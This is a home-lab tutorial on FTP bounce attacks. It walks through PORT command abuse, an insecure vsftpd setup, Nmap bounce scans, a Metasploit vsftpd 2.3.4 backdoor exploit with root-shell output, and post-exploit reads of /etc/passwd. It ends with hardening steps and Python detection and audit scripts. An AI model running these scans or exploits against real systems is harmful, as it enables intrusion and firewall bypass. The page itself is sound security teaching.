
# FTP Bounce Attack

#### Lab 1: FTP Bounce Attacks

* Use a tool like Nmap to scan for open FTP ports on a target system.
* Use a tool like Metasploit to launch an FTP bounce attack against the target system.

{% hint style="warning" %}
Only ever run this against machines you own in your isolated home lab. The host-only network adapter in VirtualBox ensures your attack traffic never leaves your machine.
{% endhint %}

### Types of Attacks on FTP Servers

#### Common Attack Types

| **Attack Type**             | **Description**                                                                                                                                     |
| --------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------- |
| Anonymous Authentication    | Allows users to log in without a specific identity, often using a common username like "anonymous." This can expose sensitive data.                 |
| Directory Traversal Attack  | Attackers exploit vulnerabilities to access files outside the intended directory structure, potentially overwriting or creating unauthorized files. |
| Cross-Site Scripting (XSS)  | Malicious scripts are sent to users via web applications, which can compromise user data and session information.                                   |
| Brute Force Attacks         | Attackers systematically try multiple username and password combinations to gain unauthorized access.                                               |
| Password Sniffing           | Intercepting unencrypted FTP traffic to capture usernames and passwords transmitted in plain text.                                                  |
| Dridex-based Malware Attack | Malware that uses FTP credentials to avoid detection, often targeting users through infected email attachments.                                     |

#### Additional Vulnerabilities

* **Unencrypted Data Transmission**: FTP transmits data in plain text, making it easy for attackers to intercept sensitive information.
* **Weak Passwords**: Many users employ simple passwords, making it easier for attackers to gain access.
* **Misconfigured Servers**: Servers that allow anonymous access or lack proper security measures are prime targets for exploitation.

## FTP Bounce Attack – What We're Actually Doing

### The Simple Analogy

Think of it like this:

You want to send an anonymous letter to someone, but you don't want them to know it came from you. So instead of mailing it yourself, you trick a **middleman** (the FTP server) into delivering it for you. The recipient sees the letter came from the middleman — not you.

That's exactly what FTP bounce does.

***

### The Real Scenario

```
YOU (Attacker)   →   FTP Server (Middleman)   →   Victim Machine
192.168.56.101       192.168.56.102               192.168.56.103
```

You never directly touch the victim. The FTP server does your dirty work, and all the traffic the victim sees comes from the FTP server's IP address — not yours.

***

### Why FTP Was Designed This Way (The History)

FTP was created in the 1970s and has two modes of operation. In **active mode**, when you connect to an FTP server and ask for a file, you tell the server "send the data to THIS address and THIS port" using the `PORT` command.

The server was designed to simply trust whatever address you gave it. In the 1970s this made sense — the internet was small, everyone trusted each other, and nobody imagined someone would abuse this.

The `PORT` command looks like this:

```
PORT 192,168,56,103,0,80
```

This tells the FTP server — send data to IP `192.168.56.103` on port `80`. The server just... does it. No questions asked.

***

### What an Attacker Does With This

Instead of giving your own IP in the PORT command, you give the IP of a **third machine you want to attack**. The FTP server then makes connections to that third machine on your behalf.

This gives you two powerful capabilities:

**1. Anonymous Port Scanning** — You can use the FTP server to probe what ports are open on another machine. The victim machine only sees connection attempts from the FTP server, not from you. This was a major way attackers hid their identity before modern logging.

**2. Firewall Bypass** — This is the really dangerous part. Imagine the victim machine has a firewall that blocks connections from the outside internet — but it trusts the FTP server because they're on the same internal network. By bouncing your attack through the FTP server, you inherit that trust. You're essentially tunneling through the firewall using the FTP server as a relay.

```
Internet  →  [FIREWALL blocks you]  →  Internal Network
                                         ↑
You  →  FTP Server (trusted by firewall)  →  Internal Victim
```
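From the defender's side, the same mechanics give a simple check: the address in a `PORT` (or RFC 2428 `EPRT`) command should be the client that owns the control connection, and RFC 2577 additionally recommends refusing data ports below 1024. The following is an added example, not code from this page or from any FTP server; the session records are constructed and the function names are this example's own.

```python
import ipaddress
import re

# Constructed control-channel records: (client IP of the control connection, command line).
SAMPLE_SESSION = [
    ("192.168.56.101", "USER anonymous"),
    ("192.168.56.101", "PORT 192,168,56,101,195,80"),  # client's own address, port 50000
    ("192.168.56.101", "PORT 192,168,56,103,0,80"),    # third host: the page's bounce example
    ("192.168.56.101", "EPRT |1|192.168.56.103|22|"),  # same request in RFC 2428 form
    ("192.168.56.101", "PORT 192,168,56,101,0,80"),    # own address but privileged port
    ("192.168.56.101", "PORT 192.168.56.103,0,80"),    # dotted form is not valid syntax
]

PORT_RE = re.compile(r"PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})$", re.I)
EPRT_RE = re.compile(r"EPRT\s+(.)[12]\1(.+?)\1(\d{1,5})\1$", re.I)

def parse_data_target(line):
    """Return (ip, port) named by a PORT/EPRT command, None for any other command."""
    m = PORT_RE.match(line)
    if m:
        h1, h2, h3, h4, p1, p2 = (int(g) for g in m.groups())
        if p1 > 255 or p2 > 255:
            raise ValueError("port byte out of range")
        return ipaddress.ip_address(f"{h1}.{h2}.{h3}.{h4}"), p1 * 256 + p2
    m = EPRT_RE.match(line)
    if m and 0 < int(m.group(3)) < 65536:
        return ipaddress.ip_address(m.group(2)), int(m.group(3))
    if line[:4].upper() in ("PORT", "EPRT"):
        raise ValueError("unparseable PORT/EPRT argument")
    return None

def classify(client_ip, line):
    """'ok', 'bounce' (target is not the client), 'low-port' (<1024) or 'malformed'."""
    try:
        target = parse_data_target(line.strip())
    except ValueError:
        return "malformed"
    if target is None:
        return "ok"
    ip, port = target
    if ip != ipaddress.ip_address(client_ip):
        return "bounce"
    return "low-port" if port < 1024 else "ok"

def scan(session):
    return [classify(ip, line) for ip, line in session]

if __name__ == "__main__":
    print(*zip(scan(SAMPLE_SESSION), (c for _, c in SAMPLE_SESSION)), sep="\n")
```

A server or an IDS rule that applies this comparison rejects the third-party request while leaving ordinary active-mode transfers untouched.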

## FTP Bounce Attack – Ubuntu Home Lab Setup

### Lab Architecture

```
Attacker Machine          Target Machine
[Kali Linux]     <——>    [Ubuntu Server]
192.168.56.101           192.168.56.102
        Both on Host-Only Network (VirtualBox/VMware)
```

{% stepper %}
{% step %}

### Step 1 – Set Up the Environment

**On VirtualBox/VMware, create two VMs:**

* **Kali Linux** (attacker) — download from kali.org
* **Ubuntu Server** (target) — download from ubuntu.com

**Set both VMs to Host-Only networking** so they're isolated from your real network.

**On Ubuntu Server — install a vulnerable FTP server (vsftpd 2.3.4 or proftpd):**

```bash
# Update system
sudo apt update

# Install vsftpd
sudo apt install vsftpd -y

# OR install proftpd (more vulnerable, better for labs)
sudo apt install proftpd -y
```

**Configure vsftpd to allow bounce (insecure config for lab purposes):**

```bash
sudo nano /etc/vsftpd.conf
```

Add/modify these lines (vsftpd treats `#` as a comment only at the start of a line, so comments go on their own lines):

```
port_enable=YES
connect_from_port_20=YES
ftp_data_port=20
# Disable passive — forces active mode (needed for bounce)
pasv_enable=NO
# Allow anonymous login for testing
anonymous_enable=YES
write_enable=YES
listen=YES
```

```bash
sudo systemctl restart vsftpd
sudo systemctl status vsftpd
```

{% endstep %}

{% step %}

### Step 2 – Discover the Target with Nmap (From Kali)

**Basic FTP port scan:**

```bash
nmap -p 21 192.168.56.102
```

**Service version detection:**

```bash
nmap -sV -p 21 192.168.56.102
```

Nmap result (this capture was taken against a host at `10.0.3.214`):

```
└─$ nmap -P -A   10.0.3.214
Starting Nmap 7.95 ( https://nmap.org ) at  07:30 EST
Nmap scan report for 10.0.3.214
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.0.3.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.52 (Ubuntu)
MAC Address: F2:2F:A7:8C:6A:32 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 10.0.3.214

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds
```

**FTP-specific NSE scripts:**

```bash
# Check for anonymous login
nmap -p 21 --script ftp-anon 192.168.56.102
```

{% endstep %}

{% step %}

### Step 3 – Manual FTP Bounce (Understand the Concept First)

Before using Metasploit, do it manually so you understand what's happening.

**Connect to FTP anonymously:**

```bash
ftp 192.168.56.102
# Username: anonymous
# Password: anything@email.com
```

**The bounce attack concept — PORT command abuse:**

```bash
# A normal PORT command tells the server where to send data back TO YOU
# Bounce abuses this — you tell the FTP server to connect to a THIRD machine instead

# Inside FTP session (address and port are six comma-separated bytes: h1,h2,h3,h4,p1,p2):
PORT 192,168,56,103,0,80
# This tells the FTP server to connect to 192.168.56.103 on port 80
# The FTP server becomes a proxy — scanning or connecting on YOUR behalf
# The traffic appears to come from the FTP server, not you
```

{% endstep %}

{% step %}

### Step 4 – FTP Bounce with Nmap (Port Scan via Bounce)

This is the classic use — use the FTP server to scan another host:

```bash
# Syntax: nmap -b <ftp_user>:<ftp_pass>@<ftp_server> <target_to_scan>
nmap -b anonymous:anonymous@192.168.56.102 192.168.56.103
```

This makes the FTP server scan `192.168.56.103` — the scan traffic comes from the FTP server's IP, not yours. This is the core of why it was dangerous — it enabled anonymous port scanning and firewall bypass.
{% endstep %}

{% step %}

### Step 5 – Metasploit FTP Bounce Attack

**Launch Metasploit:**

```bash
msfconsole
```

**Search for FTP modules:**

```bash
msf6 > search ftp bounce
msf6 > search vsftpd
```

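**Use the vsftpd 2.3.4 backdoor module (classic vulnerable version; this is a separate flaw from PORT bounce and only applies when the target runs that specific build):**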

```bash
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit > show options
msf6 exploit > set RHOSTS 192.168.56.102
msf6 exploit > set RPORT 21
msf6 exploit > run
```

If successful:

```
[*] 192.168.56.102:21 - Banner: 220 vsFTPd 2.3.4
[*] 192.168.56.102:21 - USER: 331 Please specify the password.
[+] 192.168.56.102:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.102:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened
```

**Supporting FTP checks via Metasploit (these auxiliary modules report the server version and anonymous access; they do not perform the bounce itself):**

```bash
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary > set RHOSTS 192.168.56.102
msf6 auxiliary > run

# Also try:
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary > set RHOSTS 192.168.56.102
msf6 auxiliary > run
```

{% endstep %}

{% step %}

### Step 6 – Analyze Results

**Check if attack succeeded:**

```bash
# In your Metasploit shell session:
id                          # who are you?
whoami
cat /etc/passwd             # can you read sensitive files?
uname -a                    # target OS info
netstat -an                 # what ports are open internally?
```

**Verify the bounce worked in Nmap:**

* If the Nmap bounce scan returns port states — bounce is working
* If it returns `FAILED` — the server has bounce protection
{% endstep %}

{% step %}

### Step 7 – Verify Defenses (Blue Team Perspective)

After attacking, harden the target and confirm it blocks the attack:

```bash
# On Ubuntu target — fix vsftpd config
sudo nano /etc/vsftpd.conf
```

Set these to block bounce:

```
pasv_enable=YES
# Disables PORT command = kills bounce
port_enable=NO
```

```bash
sudo systemctl restart vsftpd
```

Then re-run your Nmap bounce scan — it should fail now. This completes the full attack/defend cycle.
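
To confirm the hardened state without re-scanning, the config file itself can be audited. The following is an added example, not part of the original lab or of vsftpd: the option names come from the vsftpd.conf man page, while the policy table, function name and both sample configs are constructed for this illustration.

```python
# Policy: Step 7's settings plus two related vsftpd.conf options (the policy is this example's assumption).
POLICY = {
    "port_enable": "NO",         # no PORT command at all
    "pasv_enable": "YES",
    "port_promiscuous": "NO",    # keep the check that PORT targets the client itself
    "anonymous_enable": "NO",
}
MUST_BE_SET = {"port_enable", "anonymous_enable"}   # built-in default is YES for both
TRUE, FALSE = {"YES", "TRUE", "1"}, {"NO", "FALSE", "0"}

# Constructed inputs: a lab-style config with an inline comment, and a hardened one.
LAB_CONF = """\
port_enable=YES
pasv_enable=NO          # force active mode
anonymous_enable=YES
write_enable=YES
"""
HARDENED_CONF = """\
# bounce hardening
pasv_enable=YES
port_enable=NO
anonymous_enable=NO
"""

def audit(text):
    """Return a sorted list of (option, problem) findings for a vsftpd.conf body."""
    seen, findings = {}, []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue                      # blank line or whole-line comment
        key, _, value = line.partition("=")
        if key in POLICY:
            seen[key] = value
    for key, want in POLICY.items():
        if key not in seen:
            if key in MUST_BE_SET:
                findings.append((key, "not set, built-in default is YES"))
            continue
        val = seen[key].upper()
        if val not in TRUE | FALSE:
            findings.append((key, "not a valid boolean (trailing comment or space?)"))
        elif (val in TRUE) != (want == "YES"):
            findings.append((key, f"should be {want}"))
    return sorted(findings)

if __name__ == "__main__":
    for name, conf in (("lab", LAB_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf))
```

The "not a valid boolean" finding matters in practice: vsftpd refuses to start on such a line, so a hardening edit with a trailing comment or space never takes effect.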
{% endstep %}
{% endstepper %}

### Quick Reference Summary

| Step             | Command                                    | Purpose               | Result  |
| ---------------- | ------------------------------------------ | --------------------- | ------- |
| Discover FTP     | `nmap -sV -p 21 <target>`                  | Find open FTP         | Yes     |
| Check bounce     | `nmap --script ftp-bounce <target>`        | Confirm vulnerability | No      |
| Check anon login | `nmap --script ftp-anon <target>`          | Confirm access        | Yes     |
| Bounce scan      | `nmap -b anon:anon@<ftpserver> <victim>`   | Scan via FTP proxy    | Yes     |
| Exploit vsftpd   | `use exploit/unix/ftp/vsftpd_234_backdoor` | Get shell             | Yes     |

**Thank You For Reading..**

